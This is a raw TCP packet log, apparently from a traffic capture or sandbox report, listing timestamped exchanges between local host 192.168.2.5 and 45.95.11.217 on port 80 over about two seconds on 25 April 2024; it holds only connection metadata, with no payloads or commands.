Apr 25, 2024 22:47:49.494496107 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.494508982 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.494548082 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.494550943 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.494568110 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.494571924 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.494599104 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.494607925 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.494646072 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.494668961 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.494702101 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.494702101 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.494735956 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.494740009 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.494772911 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.494775057 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.494808912 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.494810104 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.494827032 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.494843006 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.494858980 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.495310068 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.495328903 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.495348930 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.495366096 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.495454073 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.495486021 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.495508909 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.495542049 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.499862909 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.499887943 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.499905109 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.499922991 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.499938965 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.500000954 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.500030994 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.517224073 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.517251968 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.517391920 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.519999027 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.520046949 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.520088911 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.520102978 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.520174980 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.520217896 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.520287037 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.520407915 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.520450115 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.520528078 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.520607948 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.520626068 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.520652056 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.520674944 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.520715952 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.570944071 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.570990086 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.571072102 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.725855112 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.725897074 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.725912094 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.725971937 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.726011992 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.726032972 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.726059914 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.726083994 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.726116896 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.726489067 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.726615906 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.726634979 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.726651907 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.731045008 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.731064081 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.731087923 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.731126070 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.731141090 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.731163025 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.731201887 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.731236935 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.731246948 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.731311083 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.731353998 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.731364965 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.731398106 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.731411934 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.731436968 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.731473923 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.731512070 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.746895075 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.746922970 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.746977091 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.748615026 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.748645067 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.748697042 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.748728037 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.748786926 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.748812914 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.749031067 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.749069929 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.749099016 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.749109030 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.749151945 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.749180079 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.749190092 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.749212980 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.749216080 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.749232054 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.749250889 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.749265909 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.800870895 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.800939083 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.801012993 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.801024914 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.801038027 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.801069021 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.956924915 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.957050085 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.957056999 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.957082987 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.957098007 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.957133055 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.957135916 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.957170010 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.957180977 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.957201958 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.957207918 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.957243919 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.963357925 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.963430882 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.963449955 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.963483095 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.963491917 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.963521957 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.963547945 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.963587046 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.963717937 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.963764906 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.963927031 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.963968992 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.963974953 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.964008093 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.964013100 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.964040995 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.964042902 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.964073896 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.964077950 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.964124918 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.964139938 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.964158058 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.964202881 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.964236021 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.980829000 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.980878115 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.980917931 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.980967045 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.980990887 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.981012106 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.981059074 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.981091976 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.981139898 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.981230974 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.981270075 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.981277943 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.981312037 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:49.981343031 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:49.981384039 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.032165051 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.032192945 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.032277107 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.188913107 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.188951969 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.188973904 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.188992977 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.189049006 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.189110994 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.195017099 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.195040941 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.195070028 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.195077896 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.195173025 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.195224047 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.195260048 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.195648909 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.195668936 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.195704937 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.195708990 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.196181059 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.196214914 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.196228981 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.196265936 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.196299076 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.196301937 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.211478949 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.211507082 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.211539030 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.211566925 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.211575031 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.211600065 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.211642027 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.211661100 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.211680889 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.265538931 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.266392946 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.266417980 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.266536951 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.421039104 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.421181917 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.421200991 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.421219110 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.421264887 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.421292067 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.429146051 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.429167032 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.429189920 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.429210901 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.429277897 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.429280996 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.429332018 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.430056095 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.430108070 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.430187941 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.430211067 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.430248022 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.430324078 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.430346012 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.430363894 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.430382013 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.443869114 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.443983078 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.444003105 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.444139957 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.444188118 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.444617033 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.444637060 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.444693089 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.444751978 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.444936037 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.444956064 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.444974899 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.497225046 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.497379065 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.498171091 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.498188972 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.498259068 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.652399063 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.652563095 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.652654886 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.652750969 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.652895927 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.652937889 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.660484076 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.660502911 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.660517931 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.660605907 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.660636902 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.660655022 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.660681963 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.661488056 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.661508083 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.661526918 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.663425922 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.663444996 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.663469076 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.663485050 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.663486004 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.663502932 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.673440933 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.673501015 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.673558950 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.673576117 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.673618078 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.673656940 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.673675060 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.673711061 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.673731089 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.718657970 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.726506948 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.726528883 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.726583004 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.726584911 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.726643085 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.726684093 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.727391958 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.727447033 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.727485895 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.884287119 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.884341002 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.884479046 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.892299891 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.892358065 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.892395973 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.892435074 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.892472029 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.892497063 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.892497063 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.892508984 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.892551899 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.892590046 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.892611027 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.892668009 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.894130945 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.894181013 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.894218922 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.894231081 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.894299984 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.894340038 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.903662920 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.903736115 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.903784990 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.903810978 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.903824091 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.903866053 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.903868914 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.903904915 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.903944969 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.949917078 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.949963093 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.950023890 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.957421064 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.957463980 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.957500935 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.957528114 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.957540035 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.957583904 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:50.958168983 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.958210945 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:50.958276987 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:51.113389969 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.113434076 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.113591909 CEST	49706	80	192.168.2.5	45.95.11.217
Apr 25, 2024 22:47:51.123740911 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.123791933 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.123867989 CEST	80	49706	45.95.11.217	192.168.2.5
Apr 25, 2024 22:47:51.123905897 CEST	80	49706	45.95.11.217	192.168.2.5
